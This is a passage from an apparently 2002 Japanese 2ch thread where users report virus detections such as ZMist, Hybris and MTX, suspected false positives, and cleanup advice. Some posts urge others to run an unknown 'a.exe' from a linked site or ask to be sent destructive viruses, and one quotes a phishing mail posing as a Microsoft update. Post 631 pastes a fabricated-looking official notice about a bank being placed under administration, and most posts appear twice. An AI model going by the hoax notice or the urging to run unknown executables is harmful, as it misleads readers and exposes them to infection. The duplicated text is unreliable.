誤検出でいいのかな・・・・・・
629 :(゚ρ゚)アウアー :02/03/09 21:39
>>628
うひゃ、、、Z0mbie・・・なの?
ttp://www.vnunet.com/News/1129775
↑ココに記事書いてある奴か??
多分そうだな。。
厄介だな。。。。。。。。
つか、、、ポリモエンジン自体、簡単に落せるし。。。
うひゃ、、、Z0mbie・・・なの?
ttp://www.vnunet.com/News/1129775
↑ココに記事書いてある奴か??
多分そうだな。。
厄介だな。。。。。。。。
つか、、、ポリモエンジン自体、簡単に落せるし。。。
631 :名無しさん@お腹いっぱい。:02/03/09 22:14
平成14年3月××日 預 金 保 険 機 構 理 事 長 談 話
(三井トラスト・ホールディングス株式会社の金融整理管財人への就任について)
本日、金融庁長官より、預金保険法第74条に基づく管理を命ずる処分を受け
た三井トラスト・ホールディングス株式会社の金融整理管財人として、金融
実務精通者としての法人たる預金保険機構、弁護士 ○○ ○○、公認会計
士 ○○ ○○の三者が選任された。
当機構としては、これまでの金融整理管財人としての経験等を生かし、他の
金融整理管財人ともよく協力して適切な業務運営に努めてまいりたい。
当機構から、三井トラスト・ホールディングス株式会社に派遣するスタッフは、金
融整理管財人代理 ○× ×○以下約30名である。
なお、三井トラスト・ホールディングス株式会社傘下の各行の預金等は全額保護さ
れており、善意かつ健全な借手への融資も継続する方針であり、利用者におかれて
は心配されることなく、冷静な対応をお願いしたい。
(三井トラスト・ホールディングス株式会社の金融整理管財人への就任について)
本日、金融庁長官より、預金保険法第74条に基づく管理を命ずる処分を受け
た三井トラスト・ホールディングス株式会社の金融整理管財人として、金融
実務精通者としての法人たる預金保険機構、弁護士 ○○ ○○、公認会計
士 ○○ ○○の三者が選任された。
当機構としては、これまでの金融整理管財人としての経験等を生かし、他の
金融整理管財人ともよく協力して適切な業務運営に努めてまいりたい。
当機構から、三井トラスト・ホールディングス株式会社に派遣するスタッフは、金
融整理管財人代理 ○× ×○以下約30名である。
なお、三井トラスト・ホールディングス株式会社傘下の各行の預金等は全額保護さ
れており、善意かつ健全な借手への融資も継続する方針であり、利用者におかれて
は心配されることなく、冷静な対応をお願いしたい。
632 :名無しさん@お腹いっぱい。:02/03/09 22:18
>>631
これなに?
これなに?
633 :名無しさん@お腹いっぱい。:02/03/09 22:22
634 :名無しさん@お腹いっぱい。:02/03/09 22:23
>634
一応シマンテックのオンラインスキャンもやったけど検出されず。
こっちはトレンドマイクロに分析頼んでみるよ。
一応シマンテックのオンラインスキャンもやったけど検出されず。
こっちはトレンドマイクロに分析頼んでみるよ。
636 :名無しさん@お腹いっぱい。:02/03/10 00:16
うちでもアンチドートで"Win32.ZMist"が検出された。
JUST SSYSTEMのフォルダにあった。
初めてのウイルス検出で焦って削除しちゃったよ・・・
JUST SSYSTEMのフォルダにあった。
初めてのウイルス検出で焦って削除しちゃったよ・・・
実際流行ってるのか、、誤検出なのか、、、
かなーり高度なポリモ積んでるみたいだからにょ。。
AVPとNAIだけか?一応対応してるの。
ドート君は優秀だの。
かなーり高度なポリモ積んでるみたいだからにょ。。
AVPとNAIだけか?一応対応してるの。
ドート君は優秀だの。
638 :名無しさん@お腹いっぱい。:02/03/10 01:42
193 :名無しさん@お腹いっぱい。 :02/02/06 20:17
http://www.geocities.com/kendokobayashi1111/a.html
ここに置いてるa.exeってファイル
アングラサイトで拾ったんだけど、
かなりウイルスっぽいです。
でもウイルスバスタで検出できません。
だれか実行してみて
or
他のアンチウイルスソフトで試してみて
これなんですか?
http://www.geocities.com/kendokobayashi1111/a.html
ここに置いてるa.exeってファイル
アングラサイトで拾ったんだけど、
かなりウイルスっぽいです。
でもウイルスバスタで検出できません。
だれか実行してみて
or
他のアンチウイルスソフトで試してみて
これなんですか?
639 :XYZ:02/03/10 01:55
http://www.geocities.co.jp/MusicStar-Keyboard/7230/
自作のセキュリティソフト試すんで
ハッキングかけてくれれば幸いなり
ヘボどもかかってきやがれ!!!
自作のセキュリティソフト試すんで
ハッキングかけてくれれば幸いなり
ヘボどもかかってきやがれ!!!
ウィルスに興味津々なチューボーです!
誰か送ってきてくれないかな?
けっこうHDとかボロボロにするくらい強いやつが希望
誰か送ってきてくれないかな?
けっこうHDとかボロボロにするくらい強いやつが希望
641 :名無しさん@お腹いっぱい。:02/03/10 02:03
>>640
winmxをやれ。
winmxをやれ。
642 : :02/03/10 02:07
643 :名無しさん@お腹いっぱい。:02/03/10 02:15
>>640
おまえのメアドじゃないだろ
おまえのメアドじゃないだろ
644 :名無しさん@お腹いっぱい。:02/03/10 08:36
皆さん、こんにちは。
山長って代官山にあるって聞いたんですが、具体的にどこらへんにあるのでしょうか?
山長って代官山にあるって聞いたんですが、具体的にどこらへんにあるのでしょうか?
645 :名無しさん@お腹いっぱい。:02/03/10 09:55
WORM_GIBE.Aがきた
ヘッダみないで実行するバカがひっかかりそうな内容だった
ヘッダみないで実行するバカがひっかかりそうな内容だった
646 :cheshire-cat:02/03/10 11:58
>>627
6日にinstall.exeをダブルクリックすると、winkqlu.exeなんて名前のができた。
起動時にしっかりと動いている。
ところがいつまで待っても、ファイル上書きしてくれない。
さっきまたやってみた。
Win2k パッチ全く無し、FAT32だったんだけど。日付を5日23時50分くらいにして。
6日になっても、何回再起動しても、ファイルをあぼーんしてくれなかった。
だから何ともいえないんだけど、メモ帳で破損jpgファイル開いて、どういう状態なのか確かめてみてはどうだろう。
6日にinstall.exeをダブルクリックすると、winkqlu.exeなんて名前のができた。
起動時にしっかりと動いている。
ところがいつまで待っても、ファイル上書きしてくれない。
さっきまたやってみた。
Win2k パッチ全く無し、FAT32だったんだけど。日付を5日23時50分くらいにして。
6日になっても、何回再起動しても、ファイルをあぼーんしてくれなかった。
だから何ともいえないんだけど、メモ帳で破損jpgファイル開いて、どういう状態なのか確かめてみてはどうだろう。
647 :cheshire-cat:02/03/10 12:03
上書きハカーイが見たい(鬱
648 :別スレ351 ◆enghYAOw :02/03/10 12:56
確かめてみました…
…変な文字が出てくるだけでな〜んにも分かりません。
どうなってれば大丈夫で、どうなってれば大丈夫じゃないんですか?
…変な文字が出てくるだけでな〜んにも分かりません。
どうなってれば大丈夫で、どうなってれば大丈夫じゃないんですか?
649 :名無しさん@お腹いっぱい。:02/03/10 19:01
Hybrisが毎日同じ時間にmail.kenpell-tech.net を経由して
やってくるんだけど他でもそおなん?
昨日からこなくなったけど。
中継鯖つぶれたかな?
やってくるんだけど他でもそおなん?
昨日からこなくなったけど。
中継鯖つぶれたかな?
650 :cheshire-cat:02/03/10 19:15
>>648
ハカーイ後のjpgファイルと、他から拾ってきたハカーイ前のjpgファイルを比べるとか。
同一なのに開けないなら、他の要因を考えましょうか。
違うなら、ハカーイかと。
Symantecにて、0で埋め尽くすとか書いてたけど、再現できずに実物見れてない。
どう?同じ文字ばっかりがずらーっと並んでる?
なんだか息の長いやり取りですね、互いに。
ハカーイ後のjpgファイルと、他から拾ってきたハカーイ前のjpgファイルを比べるとか。
同一なのに開けないなら、他の要因を考えましょうか。
違うなら、ハカーイかと。
Symantecにて、0で埋め尽くすとか書いてたけど、再現できずに実物見れてない。
どう?同じ文字ばっかりがずらーっと並んでる?
なんだか息の長いやり取りですね、互いに。
651 :別スレ351 ◆enghYAOw :02/03/10 19:53
見てみると0ばかりでもありません。
でもハカーイ後のファイルには必ず「run is Dos mode」の文字が…
やっぱハカーイされてるんでしょうか…
>なんだか息の長いやり取りですね、互いに。
じゃぁ、これからメールでやりとりさせてもらってもいいですか?
でもハカーイ後のファイルには必ず「run is Dos mode」の文字が…
やっぱハカーイされてるんでしょうか…
>なんだか息の長いやり取りですね、互いに。
じゃぁ、これからメールでやりとりさせてもらってもいいですか?
652 :cheshire-cat:02/03/10 20:12
>>651
あまりメルは頻繁にはチェックしないから、遅レスになると思うけど。
気になって洋モノjpgを幾つかチェックしたけど、run is dos modeって文字は無いし。
やっぱりハカーイされている可能性が大だと思う。
元々全く同じ画像ならば、それぞれ比較すればいいかと思って。
開けなくなったjpgと、それと同じもので開けるjpgってあるでしょ。
例えば壁紙とか、どっかのサイトからすぐ拾える(容易にもう一度入手できる)jpgとか。
それらに、「開ける123.jpg」「開けない123.jpg」って、名前をつけて、送ってみそ。
あまりメルは頻繁にはチェックしないから、遅レスになると思うけど。
気になって洋モノjpgを幾つかチェックしたけど、run is dos modeって文字は無いし。
やっぱりハカーイされている可能性が大だと思う。
元々全く同じ画像ならば、それぞれ比較すればいいかと思って。
開けなくなったjpgと、それと同じもので開けるjpgってあるでしょ。
例えば壁紙とか、どっかのサイトからすぐ拾える(容易にもう一度入手できる)jpgとか。
それらに、「開ける123.jpg」「開けない123.jpg」って、名前をつけて、送ってみそ。
653 :名無しさん@お腹いっぱい。:02/03/10 20:21
アンチドート簡易版を実行したところ、
二つ見つかったんだけど。(どっちも、Win32.ZMist)
\Program Files\Common Files\ASG Shared\ADDRDIC\PMLTDB32.DLL = ウイルス感染 : Win32.ZMist
\WINDOWS\TEMP\s3vv18ph.DLL = ウイルス感染 : Win32.ZMist
上にも書いてあったけど、これって…。
とりあえず隔離したところ、ゾーンアラームがなんか変な具合になりました。
(起動すると英文で”TrueVectorを探しています、キャンセルしますか?”みたいなことを聞いてきてキャンセルボタンを押してもおさなくても、ZAのアイコンがXマークになる。)
で、ネットにつながらないので、s3vv18ph.DLL だけ元に戻して今書き込んでます。
とりあえず、どのように対処したらいいっすか?
(このウイルス?の情報って、英語の奴を読んだだけなんだけど、あまり情報ないっすね)
二つ見つかったんだけど。(どっちも、Win32.ZMist)
\Program Files\Common Files\ASG Shared\ADDRDIC\PMLTDB32.DLL = ウイルス感染 : Win32.ZMist
\WINDOWS\TEMP\s3vv18ph.DLL = ウイルス感染 : Win32.ZMist
上にも書いてあったけど、これって…。
とりあえず隔離したところ、ゾーンアラームがなんか変な具合になりました。
(起動すると英文で”TrueVectorを探しています、キャンセルしますか?”みたいなことを聞いてきてキャンセルボタンを押してもおさなくても、ZAのアイコンがXマークになる。)
で、ネットにつながらないので、s3vv18ph.DLL だけ元に戻して今書き込んでます。
とりあえず、どのように対処したらいいっすか?
(このウイルス?の情報って、英語の奴を読んだだけなんだけど、あまり情報ないっすね)
654 :名無しさん@お腹いっぱい。:02/03/10 20:33
「困ったら上書き」って慣例があるだろう。
ヲイヲイ、感染したファイルを戻すなよ。普通、Zoneを殺すだろ。
ヲイヲイ、感染したファイルを戻すなよ。普通、Zoneを殺すだろ。
655 :cheshire-cat:02/03/10 20:42
656 :653:02/03/10 20:49
>>655
レスどうも。それ、昨日読んだんですが…
とりあえず、どうすればいいんでしょう??
マカフィでは削除できるみたい?
ノートン先生では、「検疫」すら出来ませんでした。
アンチドートは削除できない簡易版なので。
レスどうも。それ、昨日読んだんですが…
とりあえず、どうすればいいんでしょう??
マカフィでは削除できるみたい?
ノートン先生では、「検疫」すら出来ませんでした。
アンチドートは削除できない簡易版なので。
657 :cheshire-cat:02/03/10 22:01
>>653
それと同じファイルがあるなら、メルで送ろうとしたんだけど、無かった。
何のアプリで使っているファイルなのかわかるなら、654の人のレスに従って、それと同じファイルをもらってきて上書きとか。
>ノートン先生では、「検疫」すら出来ませんでした。
ポリモかかっているから、検出しずらいのかもなー。
それが「ガイシュツ」、の古いバージョンとは限らないし。
製品版買えばいいのに。
でもやっぱり漏れなら、しつこそうなVilliだからOSクリーンインストールする。
それと同じファイルがあるなら、メルで送ろうとしたんだけど、無かった。
何のアプリで使っているファイルなのかわかるなら、654の人のレスに従って、それと同じファイルをもらってきて上書きとか。
>ノートン先生では、「検疫」すら出来ませんでした。
ポリモかかっているから、検出しずらいのかもなー。
それが「ガイシュツ」、の古いバージョンとは限らないし。
製品版買えばいいのに。
でもやっぱり漏れなら、しつこそうなVilliだからOSクリーンインストールする。
658 :名無しさん@お腹いっぱい。:02/03/10 22:09
教えて下さい。
Norton Anti Virus2001によると、アプリの一部がBackdoor.Trojanに感染
しました。修復不可で検閲に隔離されています。
ウイルスが特定されていても、修復できないもんなのでしょうか。又、当方
Meですがシステム復元のチェックを一旦外した方がいいのでしょうか。
Norton Anti Virus2001によると、アプリの一部がBackdoor.Trojanに感染
しました。修復不可で検閲に隔離されています。
ウイルスが特定されていても、修復できないもんなのでしょうか。又、当方
Meですがシステム復元のチェックを一旦外した方がいいのでしょうか。
659 :名無しさん@お腹いっぱい。:02/03/10 22:14
Antidote Personalでの誤検出疑惑 W32/Zmistだが
今日データ更新したら、やたらと長くかかり、その後
W32/Zmist検出せず。
やっぱり誤検出だったみたい。
近々、簡易版も更新されると思う。
今日データ更新したら、やたらと長くかかり、その後
W32/Zmist検出せず。
やっぱり誤検出だったみたい。
近々、簡易版も更新されると思う。
660 :cheshire-cat:02/03/10 22:18
>>658
>システム全体のスキャンを実行し、Backdoor.Trojan として検出されたファイルをすべて削除
こんなの書いてるけど。削除すればいいのに。ウイルスそのもののファイルを修復できる訳もなく。
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.trojan.html
>システム全体のスキャンを実行し、Backdoor.Trojan として検出されたファイルをすべて削除
こんなの書いてるけど。削除すればいいのに。ウイルスそのもののファイルを修復できる訳もなく。
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.trojan.html
チェシャ猫さん、レスどうもありがとうございます。
>659
誤検出ってことは、このまま何もしなくてもオッケーってことですよね?
なんかホッとしたと同時に、
ウイルスに対する警戒心が増す今日この頃…。
>659
誤検出ってことは、このまま何もしなくてもオッケーってことですよね?
なんかホッとしたと同時に、
ウイルスに対する警戒心が増す今日この頃…。
662 :cheshire-cat:02/03/10 22:29
>>659
誤検出かぁ。
誤検出かぁ。
663 : :02/03/11 01:01
教えてください。
ハードディスクの空き容量が食われるんです。
最初は、500MBの空き容量。これがほとんど0まで
食われる。で、電源切ってしばらくすると、
もとの空き容量(500MB)に戻るんです。
これはいったいなんでしょうか。Norton
つかってスキャンしてもなにも反応なし。
ですが、ハードディスクの容量が食われる。
ハードディスクの空き容量が食われるんです。
最初は、500MBの空き容量。これがほとんど0まで
食われる。で、電源切ってしばらくすると、
もとの空き容量(500MB)に戻るんです。
これはいったいなんでしょうか。Norton
つかってスキャンしてもなにも反応なし。
ですが、ハードディスクの容量が食われる。
664 :名無しさん@お腹いっぱい。:02/03/11 12:11
665 :名無しさん@お腹いっぱい。:02/03/11 14:28
パソコンがウィルスに感染したかもしれないので
トレンドマイクロのオンラインウィルススキャンを使おうとしたのですが
更新ファイルダウンロード中にエラー7が出てダウンロードできず
ウィルススキャンできませんでした。
何故だかわかる方、教えてくれませんでしょうか?
トレンドマイクロのオンラインウィルススキャンを使おうとしたのですが
更新ファイルダウンロード中にエラー7が出てダウンロードできず
ウィルススキャンできませんでした。
何故だかわかる方、教えてくれませんでしょうか?
666 :名無しさん@お腹いっぱい。:02/03/11 14:40
>665
エラー7って何?
もっと詳しく書いて。
エラー7って何?
もっと詳しく書いて。
667 : :02/03/11 14:46
>>665
エラーさぐってる暇があったら製品版を買いに走れ
エラーさぐってる暇があったら製品版を買いに走れ
668 :665:02/03/11 15:09
>>666
「サーバーが使用中か、ネットワークトラフィックが原因だと思われます。」
と言うメッセージ、
エラーコード:7
エラーストリング:アップデートできませんでした
と言われます。
再試行しようとしたら途中で終わってしまい、ウィルス検索できません。
「サーバーが使用中か、ネットワークトラフィックが原因だと思われます。」
と言うメッセージ、
エラーコード:7
エラーストリング:アップデートできませんでした
と言われます。
再試行しようとしたら途中で終わってしまい、ウィルス検索できません。
669 :名無しさん@お腹いっぱい。:02/03/11 18:52
>>663
Me?
Me?
670 :名無しさん@お腹いっぱい。:02/03/11 21:09
671 :名無しさん@お腹いっぱい。:02/03/12 21:57
100以上のメールが添付されたメール送られたんだけど、
大丈夫ですか?送った本人は送信した覚えがないっていうんだけど。
一応ウイルスバスターではひっかからなかったんだわ。
親切な人教えてください。
大丈夫ですか?送った本人は送信した覚えがないっていうんだけど。
一応ウイルスバスターではひっかからなかったんだわ。
親切な人教えてください。
672 :名無しさん@お腹いっぱい。:02/03/12 22:04
673 :名無しさん@お腹いっぱい。:02/03/12 22:10
674 :cheshire-cat:02/03/12 22:16
>>671
それ、欲しい。是非。
それ、欲しい。是非。
675 :名無しさん@お腹いっぱい。:02/03/12 22:17
>>671
常識で考えて大丈夫なわけないだろ(送った本人も心当たりがないんだし)
常識で考えて大丈夫なわけないだろ(送った本人も心当たりがないんだし)
676 :cheshire-cat:02/03/12 22:23
新種!
677 :671:02/03/12 22:26
だから書いたままの状況なんだが。。。
あと
本人のメアドが件名に表示されていた。
送信先アドレスは添付ファイルのアドレスと同じらしい。
心当たりのあるウイルス名を教えてください。
こっちのPCは最新パターンで検索しましたところ問題なさそうです。
あと
本人のメアドが件名に表示されていた。
送信先アドレスは添付ファイルのアドレスと同じらしい。
心当たりのあるウイルス名を教えてください。
こっちのPCは最新パターンで検索しましたところ問題なさそうです。
678 :671:02/03/12 22:27
新種ですかね?
679 :名無しさん@お腹いっぱい。:02/03/12 22:29
680 :名無しさん@お腹いっぱい。:02/03/12 22:30
<IT>CからZドライブを全て上書きするFinal Fantasyワーム
http://news.2ch.net/test/read.cgi/newsplus/1015938003/l50
http://news.2ch.net/test/read.cgi/newsplus/1015938003/l50
681 :671:02/03/12 22:34
>>679
そうです。メールに添付ファイルとしてメールが100以上添付されてました。
そのメールはメモ帳で開いてみると、どうも相手のPCに保存されている
メールのようです(ヘッダー見る限り)日本語本文は文字化けでみれません。
凶悪なブラクラに引っかかったのかなとも思いますが。
そうです。メールに添付ファイルとしてメールが100以上添付されてました。
そのメールはメモ帳で開いてみると、どうも相手のPCに保存されている
メールのようです(ヘッダー見る限り)日本語本文は文字化けでみれません。
凶悪なブラクラに引っかかったのかなとも思いますが。
682 :名無しさん@お腹いっぱい。:02/03/12 22:36
(´ー`)
683 :cheshire-cat:02/03/12 22:40
684 :名無しさん@お腹いっぱい。:02/03/12 22:46
PC初心者であまりよくわからないのですが、どうやらPE_Mtx.A, WORM_MTX.A という
ウィルスにメールから感染してしまったみたいです。
「Entry-point-obscuring」を使用した32bit形式実行可能ファイル(PE形式)感染型ウイルス
というらしく、(ネットでやっと調べられました・・。)
やはり市販の駆除ソフトなどを買わなければならないのでしょうか。
どなたかウィルス駆除に詳しい方、宜しくお願い致します。
ウィルスにメールから感染してしまったみたいです。
「Entry-point-obscuring」を使用した32bit形式実行可能ファイル(PE形式)感染型ウイルス
というらしく、(ネットでやっと調べられました・・。)
やはり市販の駆除ソフトなどを買わなければならないのでしょうか。
どなたかウィルス駆除に詳しい方、宜しくお願い致します。
685 :671:02/03/12 22:49
>>683
はいメールファイルだけです。nextpartで区切られた。
ひとつひとつの添付メールは
------=_NextPart_*********************(*はランダム数列)
で区切られている。
また、タグらしきものは入ってませんでした。
はいメールファイルだけです。nextpartで区切られた。
ひとつひとつの添付メールは
------=_NextPart_*********************(*はランダム数列)
で区切られている。
また、タグらしきものは入ってませんでした。
686 :cheshire-cat:02/03/12 22:50
WEBで検索したのに、なぜ無償駆除ツールが見つけられないのか理解に苦しむ。
http://www.symantec.com/region/jp/sarcj/data/w95.mtx.fix.html
けどね、いくつかのファイルはもう破損していて修復不能だよ。
駆除成功しても、これから先、頻繁に画面が固まったり動作不良になるかと。
OSクリーンインストールをお勧めします。
http://www.symantec.com/region/jp/sarcj/data/w95.mtx.fix.html
けどね、いくつかのファイルはもう破損していて修復不能だよ。
駆除成功しても、これから先、頻繁に画面が固まったり動作不良になるかと。
OSクリーンインストールをお勧めします。
687 :名無しさん@お腹いっぱい。:02/03/12 22:52
>>684
サポートが必要なら店で買ってきたほうが自分も幸せ。周りも幸せ。
サポートが必要なら店で買ってきたほうが自分も幸せ。周りも幸せ。
688 :cheshire-cat:02/03/12 22:53
689 :671:02/03/12 22:56
>>688
まだ感染してないともいえませんよね?新種なら。
まだ感染してないともいえませんよね?新種なら。
今度からsageで書きます。すみません。
691 :名無しさん@お腹いっぱい。:02/03/12 23:02
>>689
いや、送られてきた(添付でないほうの)メールの内容が
HTMLでなくて、且つ、添付されてきたファイルのヘッダーとかに
異常がなければ、メールが感染経路でない事は分かる。
ちなみにどちらから送られてきた?
いや、送られてきた(添付でないほうの)メールの内容が
HTMLでなくて、且つ、添付されてきたファイルのヘッダーとかに
異常がなければ、メールが感染経路でない事は分かる。
ちなみにどちらから送られてきた?
692 :cheshire-cat:02/03/12 23:03
>>689
数日後にシマンテックあたりで掲載されていたら、やだね〜
漏れの経験則なんだけど。
添付ファイルが怪しくなくて、メール本文に変なコードが無ければウイルスじゃない。
でも本文じゃなくて、添付のメルファイルに挿入されていたら、やだね。
とりあえず、「もし本当にウイルスだったら」、という前提で。
受信ボックスのメールを全てエクスポートして、それから受信ボックスのメールを全て削除。
アドレス帳をエクスポートして、登録されているアドレスを削除(もしウイルスがこれから情報を得ているなら、知人に被害を及ぼすから)。
これって「過剰な反応というかやりすぎ」、かもしれないけど。
でも本文、怪しくなかったんしょ?ならいいような気もする(実物見てないから自信ないけど)。
数日後にシマンテックあたりで掲載されていたら、やだね〜
漏れの経験則なんだけど。
添付ファイルが怪しくなくて、メール本文に変なコードが無ければウイルスじゃない。
でも本文じゃなくて、添付のメルファイルに挿入されていたら、やだね。
とりあえず、「もし本当にウイルスだったら」、という前提で。
受信ボックスのメールを全てエクスポートして、それから受信ボックスのメールを全て削除。
アドレス帳をエクスポートして、登録されているアドレスを削除(もしウイルスがこれから情報を得ているなら、知人に被害を及ぼすから)。
これって「過剰な反応というかやりすぎ」、かもしれないけど。
でも本文、怪しくなかったんしょ?ならいいような気もする(実物見てないから自信ないけど)。
>>691
PCには詳しくない知り合いからです。
アウトルックも古いバージョンでした。
X-Mailer: Microsoft Outlook Express 5.00.2314.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
私のメアドがアドレス帳にあったからだとおもいます。
で、アドレス帳にあるすべてに送信したと思いますが、
そいつのアドレス帳が見れないので送信先と一致するか否かは不明です。
>>692
ありがとうございます。
ご教示いただいた対策一応やっておきます。
PCには詳しくない知り合いからです。
アウトルックも古いバージョンでした。
X-Mailer: Microsoft Outlook Express 5.00.2314.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
私のメアドがアドレス帳にあったからだとおもいます。
で、アドレス帳にあるすべてに送信したと思いますが、
そいつのアドレス帳が見れないので送信先と一致するか否かは不明です。
>>692
ありがとうございます。
ご教示いただいた対策一応やっておきます。
694 :cheshire-cat:02/03/12 23:25
695 :名無しさん@お腹いっぱい。:02/03/13 00:07
>>692
そこまでやるなら、OE捨てたほうがいい。
そこまでやるなら、OE捨てたほうがいい。
696 :名無しさん@お腹いっぱい。:02/03/13 00:08
a vexのプロテクトCDを入れると
自動的にレジストリが書き変わる等して
不具合も起こる可能性がるそうです
697 :名無しさん@お腹いっぱい。:02/03/13 00:16
英語なんてめったに使わない勤務先のアドレスに、今朝から
サブジェクトが英語なり文字化けなりのメールがいくつか来ました。
定義ファイル最新のバスターもノートンも通過。
保存して中を覗いてみると、添付ファイルの拡張子がそれぞれ
bat,xls,doc、でReturn-Pathがロシア宛。
なんだかやけに怪しくないでしょうか?
サブジェクトが英語なり文字化けなりのメールがいくつか来ました。
定義ファイル最新のバスターもノートンも通過。
保存して中を覗いてみると、添付ファイルの拡張子がそれぞれ
bat,xls,doc、でReturn-Pathがロシア宛。
なんだかやけに怪しくないでしょうか?
698 :cheshire-cat:02/03/13 00:17
699 :cheshire-cat:02/03/13 00:18
700 :名無しさん@お腹いっぱい。:02/03/13 00:30
件名が「鈴木宗男議員に関する緊急世論調査」で本文なし。
「3c8e1aaf.html」が添付されたメールが来たのですが、これが
今の流行ですか?
「3c8e1aaf.html」が添付されたメールが来たのですが、これが
今の流行ですか?
701 :697:02/03/13 00:31
702 :名無しさん@お腹いっぱい。:02/03/13 00:32
>>698
攻撃されるだけならいいけど、簡単に加害者になれるのはちょっとね。
攻撃されるだけならいいけど、簡単に加害者になれるのはちょっとね。
703 :名無しさん@お腹いっぱい。:02/03/13 00:32
>>700
なるほどつい開きたくなるな
なるほどつい開きたくなるな
704 :通行人:02/03/13 00:34
705 : :02/03/13 00:45
>>704
クリックしても大丈夫ですか?つーか、したいんですけど。
クリックしても大丈夫ですか?つーか、したいんですけど。
706 :名無しさん@お腹いっぱい。:02/03/13 00:52
707 :通行人:02/03/13 00:54
>705
逝く時はウイルススキャンで見張りを忘れずに。
逝く時はウイルススキャンで見張りを忘れずに。
>>664>>669>>670
すいません。最近忙しくて返事遅れました。
OSはWin98です。起動して3時間後ぐらいから、
ハードディスクが埋まりはじめます。
でも、まずWin板で聞いてみます。ありがとうございます。
すいません。最近忙しくて返事遅れました。
OSはWin98です。起動して3時間後ぐらいから、
ハードディスクが埋まりはじめます。
でも、まずWin板で聞いてみます。ありがとうございます。
709 :名無しさん@お腹いっぱい。:02/03/13 16:24
ここ数日、1日に数通
Subject: Internet Security Update
From: "Microsoft Corporation Security Center" <[email protected]>
To: "Microsoft Customer" <'[email protected]'>
というメールが届いてます。 q216309.exe という添付ファイルが付いてます。
で、見知らぬメールサーバーから
A message from [email protected] with the subject
Internet Security Update was not delivered to you because
it was suspected of containing a virus.
というメールが届きました。
メールは UNIX で読んでるので実害は無いのですが、
こういうのって、どっかに通報すべきですか?
Subject: Internet Security Update
From: "Microsoft Corporation Security Center" <[email protected]>
To: "Microsoft Customer" <'[email protected]'>
というメールが届いてます。 q216309.exe という添付ファイルが付いてます。
で、見知らぬメールサーバーから
A message from [email protected] with the subject
Internet Security Update was not delivered to you because
it was suspected of containing a virus.
というメールが届きました。
メールは UNIX で読んでるので実害は無いのですが、
こういうのって、どっかに通報すべきですか?
710 :名無しさん@お腹いっぱい。:02/03/13 16:29
712 :名無しさん@お腹いっぱい。:02/03/13 16:57
713 :名無しさん@お腹いっぱい。:02/03/13 19:22
すみません。質問です。
つい出来心でウイルスを実行してしまいました。
オンラインスキャンによると“W95.Hybris.gen”のようです。
Windowsが使用しているWsock.DLLを書き換えてしまい、削除できなくて困っています。
どうすれば良いでしょうか?
つい出来心でウイルスを実行してしまいました。
オンラインスキャンによると“W95.Hybris.gen”のようです。
Windowsが使用しているWsock.DLLを書き換えてしまい、削除できなくて困っています。
どうすれば良いでしょうか?
714 :もうだめぽ!:02/03/13 19:35
>>713
あきらめて、フォーマットしなさい
あきらめて、フォーマットしなさい
715 :名無しさん@お腹いっぱい。:02/03/13 19:40
>714
マジすか!
もう少し待ってみて、やはり有効な対策がないと諦めが付けばフォーマットします。
誰か良い案ないですか?
マジすか!
もう少し待ってみて、やはり有効な対策がないと諦めが付けばフォーマットします。
誰か良い案ないですか?
716 :名無しさん@お腹いっぱい。:02/03/13 19:49
717 :名無しさん@お腹いっぱい。:02/03/13 19:54
あ、削除できるんですか?
と、とりあえず方法だけでも示して頂けませんでしょうか?
と、とりあえず方法だけでも示して頂けませんでしょうか?
718 :名無しさん@お腹いっぱい。:02/03/13 20:08
719 :名無しさん@お腹いっぱい。:02/03/13 20:13
シマンテックの解説は読みました。
でも、結局「ノートン使え」としか書いてませんでした。
やはりフォーマットしかないのでしょうか・・・
でも、結局「ノートン使え」としか書いてませんでした。
やはりフォーマットしかないのでしょうか・・・
720 :cheshire-cat:02/03/13 20:25
>>719
で、どのバージョン?そのHybris。
アンチウイルスソフトの名前を書いてくれないと、変種が多い奴はレス付けづらい。
自分がレスしたのと違うバージョンだったら嫌だし。
だってアンチウイルスソフトごとに検出名が異なるって、よくあること。
どんぞ。参考までに。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_HYBRIS.A
で、どのバージョン?そのHybris。
アンチウイルスソフトの名前を書いてくれないと、変種が多い奴はレス付けづらい。
自分がレスしたのと違うバージョンだったら嫌だし。
だってアンチウイルスソフトごとに検出名が異なるって、よくあること。
どんぞ。参考までに。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_HYBRIS.A
721 :名無しさん@お腹いっぱい。:02/03/13 20:34
アンチウイルスソフトは持ってないです・・・根本から間違ってますか(;;
トレンドマイクロの自動修復ツール、どうもありがとうございます!
これでどうにかなりそうです。
まずは細かいバージョンを調べてきます。
重ね重ねありがとうございました。
トレンドマイクロの自動修復ツール、どうもありがとうございます!
これでどうにかなりそうです。
まずは細かいバージョンを調べてきます。
重ね重ねありがとうございました。
722 :名無しさん@お腹いっぱい。:02/03/13 21:19
土曜日からメールを出したことのない人から
「お宅からウイルスが届きました」というメールが来ました。
私は出した覚えがないので出していませんがという
メールを送ったのですが、その方も私に送った覚えがないと・・・
その人の所には1時間の間に3000通のメールが届いたそうです。
今日は別の人からお宅から苦情メールが届くんだけどというメールを貰ったのですが、
出した覚えが全くない人からです。
ノートンを常駐させていて、Trend Microのオンラインスキャンもかけましたが
ウイルスに感染はしていませんでした。
上に書いたメールには添付も何もありません。
これって誰かがウイルスにかかっていて、それが勝手に届くと言うことなのでしょうか?
全く見知らぬ人からなので気持ちが悪くて・・・
どなたか何か知っていれば教えて下さい。お願いします。
「お宅からウイルスが届きました」というメールが来ました。
私は出した覚えがないので出していませんがという
メールを送ったのですが、その方も私に送った覚えがないと・・・
その人の所には1時間の間に3000通のメールが届いたそうです。
今日は別の人からお宅から苦情メールが届くんだけどというメールを貰ったのですが、
出した覚えが全くない人からです。
ノートンを常駐させていて、Trend Microのオンラインスキャンもかけましたが
ウイルスに感染はしていませんでした。
上に書いたメールには添付も何もありません。
これって誰かがウイルスにかかっていて、それが勝手に届くと言うことなのでしょうか?
全く見知らぬ人からなので気持ちが悪くて・・・
どなたか何か知っていれば教えて下さい。お願いします。
723 :cheshire-cat:02/03/13 21:25
>>722
感染しているのは相手の方という説も。またウイルスが送信者をごまかしているとか。
また誰かが君を装って意図的にメル送ってる可能性もあるかと。
相手に連絡して、送信者のメールヘッダから、IPアドレスを見てみ。
